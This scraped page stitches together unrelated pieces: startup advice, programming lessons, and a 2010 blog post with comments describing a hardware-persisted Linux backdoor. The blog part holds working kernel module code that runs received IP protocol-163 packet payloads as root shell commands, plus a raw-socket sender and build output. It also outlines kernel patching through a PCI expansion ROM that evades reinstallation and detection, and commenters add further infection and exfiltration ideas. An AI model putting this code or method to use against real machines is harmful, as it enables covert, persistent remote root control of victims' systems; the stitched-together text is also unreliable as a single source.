18. Co-locate as best possible but be willing to travel to remote offices to make multiple offices work. Online collaboration maxes out at 3 to 4 weeks apart, which means you need to commit to traveling almost monthly to make remote offices work.

19. Work with people you like to be around. There’s no sense in going to war with people you don’t like.

20. Work with people you trust like family.

21. Work from home as long as you can.

22. Position your desk in a way in which you are staring at your co-founders and they are staring at you. If you aren’t enjoying looking at each other each day, you’re working with the wrong people.

23. Use a tool like Yammer to share internally what you’re working on. It’s easier for many people (especially developers) to post a status update than to write an email.

24. Use a file sharing service like basecamp for your team. It’s impossible for everyone to keep track of every file sent to their email in-box. Use basecamp so there’s a history and central repository.

25. Figure out quickly what you are personally really good at and focus your personal time around those activities. Let other people do the other stuff.

26. Surround yourself with people who fill your gaps. Let them do the stuff they are better at. Don’t do their jobs.

27. Work with people who are smarter than you at certain things.

28. Work with people who argue with you and tell you no.

29. Be willing to fight like hell during the day but still love each other when you go home.

30. Work with people who are passionate about solving the specific problem you are trying to solve. Passion for building a business is not enough; there needs to be passion for your customer and solving your customer’s problem.

31. Push the people around you to care as much as you do.

32. Be loyal. Cultivate and coach people vs. churning through them.

33. You’re never as right as you think you are.

34. Go to the gym and/or run at least 4 times per week. Keep your body in shape if you want to keep your mind in shape.

35. Don’t drink on airplanes unless you are on a flight of longer than 8 hours. It ruins you and wastes your time.

36. Choose your investors based on who you want to work with, be friends with, and get advice from.

37. Don’t choose your investors based on valuation. A couple of dilution points here or there won’t matter in the long run but working with the right people will.

38. Raise as little money as possible when you first start. Force yourself to be budget constrained as it will cause you to carefully spend each dollar like it is your last.

39. Once you have some traction, raise more money than you need but not more than you know what to do with. This is tricky. Don’t skimp on fundraising because of dilution fears.

40. Spend every dollar like it is your last.

41. Know what kind of company you are trying to build. There are very few Googles and Facebooks. A good outcome for your business might be a $10M exit or a $20M exit or a $100M exit or no exit at all. Plan for the business you want to build. Don’t just shoot for the moon. From a money-in-your-pocket and return on time spent standpoint, owning 20% of a $20M exit in 2 years is much better than owning 3% of a $100M business in 5 years.

42. Related to #41, understand whether your business is a VC business or not. A VC business is expected to deliver 10x returns to investors. That means if you’re taking money with a $5M post-money valuation, the expectation is that you are building for a minimum $50M exit. $10M post-money valuation = $100M target. That’s not to say that you might not sell the company for less and everyone involved might be happy with that outcome, but that’s not what you are signing up for when you take VC money with such a valuation. Know what the implications of taking VC money are and what it means for expectations on you.

43. Make sure your personal business goals are aligned with the goals of your investors. The business will only succeed if you are motivated. Investors can’t force the business to succeed. And they certainly can’t force a CEO to care.

44. Conferences are generally a waste of time.

45. Smile. Laugh. Wear funny socks. I wear funny socks to remind myself to not settle for boring and to be creative.

46. Do something, anything that shows you’re not just a robot. Let people get to know the real you.

47. Hang a lantern on your hangups.

48. Wear your company’s t-shirts everywhere.

49. Do your own customer service.

50. Tell a good story.

51. But don’t lie. Ever.

52. Find inspiration in the people around you.

53. Have fun every single day. If it’s not fun, stop doing it. No one is making you.

54. It’s true what they say in sales, you’re only as good as your last sale.

55. Make mistakes, but learn from them. I’ve made hundreds.

56. Mature, but don’t grow up.

57. Never give up.

30 lessons learned in computing over the last ten years

In looking at the last ten years of my life, I realized that I've learned many things. Mostly about how wrong I've been, and how stupid I've been. So, having looked at the 80+ projects I've worked on in the past ten years (excluding coursework, current start-ups, and graduate studies), I have reduced what I learned to a blog post. (In bullet format, no less.)

- If you plan to write a programming language, then commit to every aspect. It is one thing to translate between languages; it is an entirely different effort to provide good error/warning messages, good developer tools, and to document an entirely different way of thinking. In writing Kira, I invented a whole new way to think about how to code, and while much of it was neat to me; some of it was very wrong and kinda stupid.

- Geometric computing is annoying, always use doubles. Never be clever with floats; floats will always let you down. Actually, never use floats.

- Lisp is the ultimate way to think, but don’t expect everyone to agree with you. Actually, most people will look at you as if you are crazy. The few that listen will revere you as a god that has opened their eyes to computing.

- If you plan on writing yet another Object Relational Mapper, then only handle row writing/transactions. Anything else will be wrong in the long term.

- If you want to provide students with a computer algebra system, then make sure they can input math equations into a computer first.

- Don’t build an IDE. Learn to use terminal and some text editor. If you need an IDE, then you are doing something wrong. When you master the terminal, the window environment will be cluttered with terminals and very few “applications”.

- Learn UNIX, they had 99% of computing right. Your better way is most likely wrong at some level.

- Avoid XML, use JSON. Usage of text formats is a boon to expressiveness and the fact that computing has gotten cheap. Only use binary based serialization for games.

- If you plan to build an ORM to manage and upgrade your database, then never ever delete columns; please rename them.

- Never delete anything, mv it to /tmp

- Never wait for money to do anything; there is always a place to start.

- Optimize complexity after people use a feature and complain. Once they complain, you have a real complexity problem. I’ve had O(n^3) algorithms in products for years, and it didn’t matter because the features they powered were not used.

- Text games can be fun too; if you want to write an MMO, then make a MUD. You can get users, and then you can use that to get traction to build something bigger. Develop rules and a culture.

- Don’t worry about concurrency in your database until you have real liabilities issues.

- Backup every day at the minimum, and test restores every week. If your restore takes more than 5 minutes of your time (as in time using the keyboard), then you did something wrong. If you can’t backup, then you have real issues and enough money to solve them with massive amounts of replication.

- Never write an IDE; it will always be a mistake. However, if you do make it, then realize most people don’t know that silver bullets don’t exist. You can easily sell it if you find the right sucker; this will of course become a part of your shame that you must own up to when you die.

- JavaScript is now the required programming language for the web; get used to it. JavaScript is also going to get crazy fast once people figure out how to do need based type inference. Once JavaScript is uber, learn to appreciate the way it works rather than map your way of thinking to it.

- Master state machines, and you will master custom controls. Learn enough about finite state machines to be able to draw pictures and reason about how events coming into the machine affect the state.

- There is more value in learning to work in and around piles of crappy code than learning to make beautiful code; all code turns into shit given enough time and hands.

- If you want to build a spreadsheet program, then figure out how to extend Excel because Excel is god of the spreadsheet market.

- Write five games before writing a game engine.

- Debugging statistical applications is surprisingly difficult, but you can debug it by using R and checking the results with statistics.

- Don’t design the uber algorithm to power a product; instead figure out how to make a simple algorithm and then hire ten people to make the product uber.

- Learn to love Source Control. Backups are not enough. As you age, you will appreciate it more.

- Communicate to people more often, don’t stay in the cave expecting people will know your genius. At some point in your life, you will need to start selling your genius.

- Realize that every product that exists solves some kind of problem. Rather than dismissing the product, find out more about the problem the product is trying to solve. Life is easier when you can look at new technology and find out what it does solve.

- Learn to be sold. Keep the business card of a good salesman. Sometimes, they actually have good products, but they are always useful.

- You can make developers do anything you want. Normal users on the other hand are not so masochistic.

- If you are debating between Build or Buy, then Build. The fact that you’re debating means you don’t know enough to make a sound decision, and by building you will at least have something working before you figure out what to Buy and how to design around it.

- You will pay dearly for being prickly; learn to be goo and flexible to the changing world. Be water, my friend.

If you got to this point, then good job. The biggest thing I have learned (and probably the most painful) in the past ten years is how to deal with my ego. Ego is supposedly your best friend, but it is also your worst enemy. Ego is a powerful force, but it isn't the right force to use. While I admit that I've used ego to push myself in a very positive direction, I think I would have been better off if I hadn't, as the side effects trump the pros.

31/10/10

Hosting backdoors in hardware

Posted in security on October 27th, 2010 by rwbarton – 12 Comments

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we’re going to describe how we can gain full control of someone’s machine by giving them a piece of hardware which they install into their computer. The backdoor won’t leave any trace on the disk, so it won’t be eliminated even if the operating system is reinstalled. It’s important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I’ll let you figure out the social engineering side of getting the hardware installed (birthday “present”?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We’re going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it’s mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module
The easiest way to modify the behavior of our kernel is by loading a kernel module. Let’s start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We’re going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we’ll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:
/* Headers needed at the top of the module source: */
#include <linux/module.h>   /* basic module support */
#include <linux/skbuff.h>   /* struct sk_buff, kfree_skb */
#include <linux/kmod.h>     /* call_usermodehelper */
#include <net/protocol.h>   /* struct net_protocol, inet_add_protocol */

/* Run the packet's payload as a shell command with root privileges. */
int exec_packet(struct sk_buff *skb)
{
        char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
        char *envp[1] = {NULL};

        call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);

        kfree_skb(skb);
        return 0;
}

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:
/* Table entry for protocol 163, pointing at our handler. */
const struct net_protocol proto163_protocol = {
        .handler = exec_packet,
        .no_policy = 1,
        .netns_ok = 1
};

/* Register the handler for protocol number 163 when the module loads. */
int init_module(void)
{
        return (inet_add_protocol(&proto163_protocol, 163) < 0);
}

Let’s build and load the module:
rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
CC [M] /home/rwbarton/exec163.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/rwbarton/exec163.mod.o
LD [M] /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko
Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:
rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip
rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x
Great! It worked. Note that we have to send a null-terminated string in the payload, because that’s what call_usermodehelper expects to find in argv and we didn’t add a terminator in exec_packet.
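
As an aside, sendip isn’t strictly required; any tool that can emit a raw IP packet will do. Below is a minimal user-space sketch using a raw socket, which must run as root; the target address 192.0.2.10 is a placeholder for $targetip, and the payload is just the example command from above:

/* Sketch: send an IP packet with protocol number 163 via a raw socket.
 * The kernel fills in the IP header; the payload (including its trailing
 * '\0') becomes everything after the header, which exec_packet will run. */
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

int main(void)
{
        const char *payload = "touch /tmp/x";            /* command to execute */
        struct sockaddr_in dst = { .sin_family = AF_INET };
        int s = socket(AF_INET, SOCK_RAW, 163);          /* protocol number 163 */

        if (s < 0) { perror("socket"); return 1; }
        inet_pton(AF_INET, "192.0.2.10", &dst.sin_addr); /* placeholder target */
        /* send strlen+1 bytes so the '\0' terminator travels with the payload */
        if (sendto(s, payload, strlen(payload) + 1, 0,
                   (struct sockaddr *)&dst, sizeof(dst)) < 0)
                perror("sendto");
        close(s);
        return 0;
}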

Modifying the on-disk kernel
In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we’re just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it’s called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We’re going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:
1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
3. it ran our init_module function.
We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel’s startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.
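
To make that concrete, here is a rough sketch of what “defining them as constants” could look like. The numeric addresses are placeholders that you would read by hand from the target’s /boot/System.map-2.6.32-24-generic or /proc/kallsyms; the declarations assume the headers already pulled in by the module code above.

/* Sketch only: hard-coded symbol addresses for this exact kernel build.
 * The values below are placeholders, not real addresses. */
#define KFREE_SKB_ADDR    0xc04f23a0UL   /* placeholder: address of kfree_skb */
#define INET_PROTOS_ADDR  0xc07a1a80UL   /* placeholder: address of inet_protos[] */

static void (*my_kfree_skb)(struct sk_buff *) =
        (void (*)(struct sk_buff *)) KFREE_SKB_ADDR;

/* inet_protos is indexed by protocol number; writing our pointer into
 * slot 163 has the same effect as calling inet_add_protocol(..., 163). */
static const struct net_protocol **inet_protos_table =
        (const struct net_protocol **) INET_PROTOS_ADDR;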

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module’s code and data, but we need to make our changes before the kernel has started running, so the memory allocator won’t be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we’d still have to find somewhere to store that extra code.

What we’re going to do is cheat and find some data which isn’t used for anything terribly important, and overwrite it with our own data. In general, it’s hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it’s unlikely to ever be triggered. We’ll need well under 180 bytes for our data, so let’s look for strings in the kernel image which are at least that long:
rwbarton@target:~$ strings vmlinux | egrep '^.{180}' | less
One of the output lines is this one:
<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn’t find any occurrences of this message which aren’t from the kernel source code. So, we’re going to just overwrite it with our data.
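
Finding where that message lives in the decompressed image is the same job a tool like strings -t x would do; for completeness, here is the search sketched in C (the program name, file name, and buffer handling are my own, not from the original write-up):

/* Sketch: print the byte offset of the eCryptfs error string inside a
 * decompressed kernel image. Usage: ./findstr vmlinux */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char **argv)
{
        static const char needle[] =
                "Attempt to access file with crypto metadata";
        FILE *f;
        char *buf;
        long size, i;

        if (argc < 2) { fprintf(stderr, "usage: %s <image>\n", argv[0]); return 1; }
        f = fopen(argv[1], "rb");
        if (!f) { perror("fopen"); return 1; }
        fseek(f, 0, SEEK_END);
        size = ftell(f);
        rewind(f);
        buf = malloc(size);
        if (!buf || fread(buf, 1, size, f) != (size_t)size) { fclose(f); return 1; }
        for (i = 0; i + (long)(sizeof(needle) - 1) <= size; i++)
                if (memcmp(buf + i, needle, sizeof(needle) - 1) == 0)
                        printf("found at offset 0x%lx\n", i);
        free(buf);
        fclose(f);
        return 0;
}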

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don’t expect the decompression to fail, because we didn’t modify the compressed image at all. So we’ll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process
Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines an “expansion ROM” mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we’ll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn’t know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we’re going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that’s just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.
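
To make the sector check concrete, here is the decision logic sketched in C; the real handler is 16-bit real-mode code stored in the expansion ROM, and the struct fields below are placeholders describing one sector of vmlinuz we want to alter.

#include <string.h>

/* Sketch only: how the hook decides whether the sector just read by the
 * original int 0x13 handler is one we want to patch. */
struct sector_patch {
        unsigned char match[16];   /* first bytes that identify "our" sector */
        unsigned int  offset;      /* where within the 512-byte sector to write */
        unsigned int  len;         /* number of bytes to replace */
        unsigned char bytes[64];   /* replacement bytes */
};

static void maybe_patch_sector(unsigned char *sector, const struct sector_patch *p)
{
        /* ext4 keeps file data sector-aligned, so the first few bytes are
         * enough to recognize the sector of vmlinuz we care about. */
        if (memcmp(sector, p->match, sizeof(p->match)) == 0)
                memcpy(sector + p->offset, p->bytes, p->len);
}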

In summary, the boot process of the system with our PCI card inserted looks like this:
• The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
• The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
• The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
• GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
• GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
• The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
• The kernel continues to boot normally.
We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it’s not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn’t realistically worry about installing commodity hardware from reputable vendors. After all, you’re already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.

Comments (12)

AOrtega says:
October 27, 2010 at 1:07 pm
Great article.
I saw something similar in the paper “Implementing and Detecting a PCI Rootkit” by Heasman (http://www.blackhat.com/presentations/bh-dc-07/Heasman/Paper/bh-dc-07-Heasman-WP.pdf) and in “PCI rootkits” by Lopes/Correa (http://www.h2hc.com.br/repositorio/2008/Joao.pdf). If my memory doesn’t fail me, they used INT 10h as the attack vector.
Finally, we suggested something similar in our own paper “Persistent BIOS Infection” (http://www.phrack.org/issues.html?issue=66&id=7) by using BIOS32 calls directly from the kernel, but maybe your approach is simpler and more effective.
However, I’m not sure if it’s correct to call this “backdoors in hardware”, as you are clearly modifying software or in the best case, firmware.
BTW, patching a gzipped binary like vmlinuz should be non-trivial. Any idea on how to make this simple?

Anonymous says:
October 27, 2010 at 5:00 pm
This is all very good and fine — but how does it deal with customized kernels? Or compressed vmlinux binaries? The kernel’s build system permits at least three kinds of compression already.

Kristian Hermansen says:
October 27, 2010 at 11:02 pm
Cool technique. I was at the first LEET conference in San Francisco where a guy presented a method of doing something similar by disabling protected memory space after the kernel was loaded (no need for BIOS hijacking).
http://www.usenix.org/event/leet08/tech/full_papers/king/king_html/

Atul Sovani says:
October 28, 2010 at 6:26 am
Hi, please excuse me if it’s my poor understanding, but I think there is a mismatch in the sample code.
In the sample code given, the handler function is exec_packet(), whereas in struct net_protocol proto163_protocol, the handler is defined to be print_packet(). Shouldn’t that be exec_packet() instead?
Very good and informative article otherwise! Thanks for the great article!

Christian Sciberras says:
October 28, 2010 at 9:50 am
Nice read. Saw this being done with graphics cards. For those still thinking this is fiction, may I remind you of the batch of Seagate (I think?) hard disks infected with MBR viruses?
Of course that worked differently.
Either case, think of this, who’s the major hardware manufacturer? The next time your silicon valley guy designs a new processor and tasks some Chinese people to do the manufacturing, how do you know that you’re getting what you think you are?
Oh, and there was the issue of the DoD and US Military using compromised (and/or fake) Cisco routers from cheap “gold” partners.
Indeed, if one does some research one might see how the battlefield in cyberwarfare is actually changing.

Peter da Silva says:
October 28, 2010 at 10:08 am
Next step, patching the firmware of a PCI card to include this hack by flashing it from a running system…

rwbarton says:
October 28, 2010 at 12:40 pm
Hi Atul,
Oops, you’re quite right–print_packet was accidentally left over from an older version of the code. I’ve corrected this mistake.

nerd says:
October 28, 2010 at 3:47 pm
Good explanation. But the difficulty is the huge number of different Linux distributions and graphics cards, isn’t it? You would need a large library of flashing programs for all of these cards, correct?

Kevin Marquette says:
October 29, 2010 at 12:44 pm
Nice write-up. Even though it is hard to pull off today with all the different hardware and versions of Linux, people will find a way to make this easier and better.

Anonymous says:
October 29, 2010 at 3:33 pm
I can think of much better ways to do this off the top of my head. Why not infect the boot block of the BIOS flash ROM? The user can’t normally change this area of flash: an area of the flash chip can be protected from change, so a normal BIOS flash upgrade would not affect it. This area is normally used for bootstrapping, e.g. “QFlash”, which can automatically read a BIOS update from floppy. Only the hardware WP signal can allow a flash change. Simply touch a certain pin on the chip, install the spyware, and now the system is permanently infected. The same flash chips are used across board vendors, and the protection level varies by implementation, but it’s possible that even some boards can be infected in pure software and consequently permanently locked down, so only a new flash chip could un-infect it.
See http://www.winbond-usa.com/products/winbond_products/pdfs/Memory/APNMNV07.pdf for a sample datasheet.
I can think of far nastier things too – can’t a rogue card on the PCI bus read any memory? Could you snoop on PCI transactions? What about the ASIC (ie another cpu on the board) that normally controls the overclocking functions etc., even if the CPU isn’t working? As for sending data, don’t use the normal internet – you can easily use Van Eck techniques to reliably send data with just software. What about hiding a bluetooth chip?
Any one of you can now go off and develop such products – and I’m sure it’s all been done already; just think what a company in business for 10 years has developed, even the most advanced techniques. Somewhere in the world it’s for sale right now. Many security products are actually advertised publicly; however, some countries have laws against such advertisements in public, so they have to use direct marketing.

Anonymous says:
October 29, 2010 at 3:40 pm
ps all you really need is the ability to read/write memory (and avoid normal memory protection mechanisms). I would make the backdoor the client, and the host program can be a full-fledged GUI with continual updates for various control functions for all major operating systems. Keyboard data and screen grabs would be two useful utilities based on the simplest of clients. Real-time video would need some high-bandwidth, RF-based communication, however. But remember, any TV/flat panel is easily picked up with Van Eck (in the case of a flat panel, you receive a differential signal, so certain color schemes are more secure than others). DisplayPort was specifically designed with Van Eck in mind… and I think HDMI was too.